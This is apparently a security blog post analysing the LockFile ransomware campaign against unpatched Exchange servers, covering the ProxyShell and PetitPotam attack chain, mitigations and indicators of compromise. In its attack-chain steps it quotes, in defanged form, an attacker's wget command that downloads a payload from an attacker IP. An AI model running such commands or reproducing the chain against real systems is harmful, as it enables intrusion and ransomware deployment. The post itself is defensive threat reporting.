• Home
  • |
  • Blog
  • |
  • How Does The New LockFile Ransomware Compromise The Domain Controller? And, How You Should Protect?
New LockFile Ransomware

Researchers have observed new ransomware dubbed as “LockFile ransomware” targetting Unpatched Microsoft Exchange servers. Threat actors will gain access to the Victim’s network through Microsoft exchange servers by exploiting the three chained Microsoft Exchange vulnerabilities tracked as CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207. After exploiting the Exchange server, threat actors use PetitPotam vulnerability to take over Windows domains and encrypt the compromised systems. Successful exploitation of these vulnerabilities results in unauthenticated Remote Code execution. It’s important to know how does LockFile ransomware compromises the domain controller and how to protect exchange servers from the new LockFile ransomware.

Victims Of The New LockFile Ransomware

This new LockFile ransomware has compromised at least more than 10 businesses in the ongoing campaign. The campaign didn’t keep a specific target at the time of writing this post. However, it seems to be targeting victims in various sectors around the globe: manufacturing, engineering, business services, legal, financial services, travel, and tourism sectors.

When Was The New LockFile Ransomware Seen?

LockFile ransomware is one of the newly found malware. It was first seen on July 20, 2021, on the network of a U.S. Its first action was recorded as recently as August 20. However, Comprehensive analysis is still underway. We will come to know more and more about ransomware as we progress in analysis. You can track the updates here.

The LockFile Ransom Note:

Like other ransomware, LockFile leaves a ransom note with standard instructions and contact information to the Victim.


Figure 1. The LockFile ransom note

How Does The New LockFile Ransomware Compromise The Victim?

In the previous sections, we have seen about the new LockFilw ransomware and its victims. In this section, we will see how does LockFile Ransomware Compromise the Victim.

  1. The initial attack vector is still unknown. However, researchers suspected that threat actors might have use proxyshell chain vulnerabilities tracked as CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207 were used to compromise the exchange servers.
  2. Once the actor compromises the exchange, he runs wget commands on the PowerShell to download some unknown files from the IP address 209.14.0[.]234.  > wget hxxp://209.14.0[.]234:46613/VcEtrKighyIFS5foGNXH
  3. Typically, before 20 to 30 minutes of installing ransomware, the actor installs a set of tools’ efspotato.exe, an exploit for the CVE-2021-36942 vulnerability, active_desktop_render.dll, and active_desktop_launcher.exe on the compromised exchange server. 
  4. The actor use active_desktop_launcher.exe, a legitimate version of KuGou Active Desktop file to load the active_desktop_render.dll file. The active_desktop_render.dll then decrypt a file in the local directory called ‘desktop.ini,’ which is a shellcodeFurther analysis is yet to be done to reveal more information about ‘desktop.ini.’
  5. Shellcode inside the desktop.ini file activates the efspotato.exe file, which has an exploit for the PetitPotam NTLM relay attack
  6. After the successful exploitation of the PetitPotam vulnerability on local domain controllers, The actor will copy the LockFile ransomware file with a batch file and supporting executables on the compromised domain controllers under the ‘sysvol\domain\scripts’ directory. 
  7. Files inside the ‘sysvol’ directory:
    1. Autologin.bat
    2. Autologin.exe
    3. Autologin.dll
    4. Autologin.sys
    5. Autoupdate.exe
  8. The LockFile ransomware will copy the batch scripts and other executables inside the “sysvol\domain\scripts” directory to the clients when they try authenticating with the domain controller.  
See Also  CISA Published A Catalog Of Known Exploited Vulnerabilities

How You Should Protect Domain Controllers From The New LockFile Ransomware?

  1. It is recommended to keep the operating system updated to the current released patch level. Since LockFile ransomware targets the Victim using the Microsoft Exchange ProxyShell vulnerabilities and the Windows PetitPotam NTLM Relay vulnerability.
  2. Check for the presence of attack indicators in your network and deploy detection rules at the network and endpoint levels. Block IOC‘s as mentioned in this advisory.
  3. Keep Anti-malware solutions at the endpoint and network-level updated at all times.
  4. Deploy Endpoint Detection & Response (EDR) tools to detect the latest malware and suspicious activities on endpoints.

Indicators Of Compromise (IoC) Of The New LockFile Ransomware:

IP address: 209.14.0.234

File hashesDescription
ed834722111782b2931e36cfa51b38852c813e3d7a4d16717f59c1d037b62291active_desktop_render.dll
cafe54e85c539671c94abdeb4b8adbef3bde8655006003088760d04a86b5f915autoupdate.exe
36e8bb8719a619b78862907fd49445750371f40945fefd55a9862465dc2930f9autologin.sys
5a08ecb2fad5d5c701b4ec42bd0fab7b7b4616673b2d8fbd76557203c5340a0fautologin.exe
1091643890918175dc751538043ea0743618ec7a5a9801878554970036524b75autologin.dll
2a23fac4cfa697cc738d633ec00f3fbe93ba22d2498f14dea08983026fdf128aautoupdate.exe
7bcb25854ea2e5f0b8cfca7066a13bc8af8e7bac6693dea1cdad5ef193b052fdefspotato.exe
c020d16902bd5405d57ee4973eb25797087086e4f8079fac0fd8420c716ad153active_desktop_render.dll
a926fe9fc32e645bdde9656470c7cd005b21590cda222f72daf854de9ffc4fe0autoupdate.exe
368756bbcaba9563e1eef2ed2ce59046fb8e69fb305d50a6232b62690d33f690autologin.sys
d030d11482380ebf95aea030f308ac0e1cd091c673c7846c61c625bdf11e5c3aautoupdate.exe
a0066b855dc93cf88f29158c9ffbbdca886a5d6642cbcb9e71e5c759ffe147f8autoupdate.exe

Thanks for reading this threat post. Please make sure you are protected from the new LockFile ransomware and share this poet to protect others.

Read more such interesting articles on wordpress-753125-2540596.cloudwaysapps.com.

About the author

Arun KL

Hi All, I am Arun KL, an IT Security Professional. Founder of “thesecmaster.com”. Enthusiast, Security Blogger, Technical Writer, Editor, Author at TheSecMaster. To know more about me. Follow me on LinkedIn

Leave a Reply

Your email address will not be published. Required fields are marked

{"email":"Email address invalid","url":"Website address invalid","required":"Required field missing"}

Learn Something New with Free Email subscription

Email is also one of the ways to be in touch with us. Our free subscription plan offers you to receive post updates straight to your inbox.